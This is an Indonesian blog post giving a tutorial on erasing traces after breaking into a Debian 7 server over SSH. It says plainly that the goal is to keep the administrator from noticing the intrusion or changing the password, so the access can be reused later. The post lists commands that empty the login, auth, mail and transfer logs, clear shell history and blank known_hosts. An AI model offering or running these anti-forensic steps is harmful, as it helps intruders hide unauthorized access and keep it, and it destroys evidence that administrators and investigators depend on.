Wednesday, March 6, 2019

Menghapus log SSH server debian 7

Bagaimana cara agar si admin tidak mengira bahwa servernya pernah dimasuki dan diutak-atik seseorang lewat remote shell ssh. Sehingga siadmin tidak merubah-rubah password untuk kita gunakan pada penyusupan berikutnya. 

Menghapus log juga bertujuan untuk tidak meninggalkan ip address yg bisa dilacak kepunyaanya oleh si admin. 

Tutorial ini berkaitan dengan cara menghapus semua log yg mencatat aktifitas penyusup dalam sistem operasi linux. 

Menghilangkan diri dari perintah last (perintah untuk melihat catatan semua user yg pernah login/logout baik local moupun remote) command yg digunakan adalah: 



#echo >/var/log/wtmp 
#echo >/var/log/lastlog 

Log-log yang lain yg perlu dihapus pake command: 

#echo >/var/log/messages 
#echo >/var/log/secure 
#echo >/var/log/maillog 
#echo >/var/log/xferlog 

Jangan lupa terakhir menghapus history shell command: 
#history -c 
cara alternative yang yahudd....masuk ke teminal
ketikan perintah

#nano  ~/.ssh/known_hosts
atau
echo "" >/home/labkom/.ssh/known_hosts
 hapus semua isi file dengan ctrl+K
tekan ctrl+x lanjut Y lanjut enter....

silahkan pake ssh nya lagi...

setelah itu jangan ketik apa-apa lagi, just logout or cltr+D 
Share This
Previous Post
Next Post

0 komentar:

Terimakasi telah mengunjungi blog ini , semoga informasi yang terdapat dalam blog ini bermafaat bagi anda jika informasi yang kalian baca di blog ini bermanfaat silahkan di Share dan beri komentar :)
Perhatian !!!

Berkomentarlah yang baik dan sopan !
jika mengirim link aktif komentar anda akan di anggap spam !
berkomentarlah sesuai topik !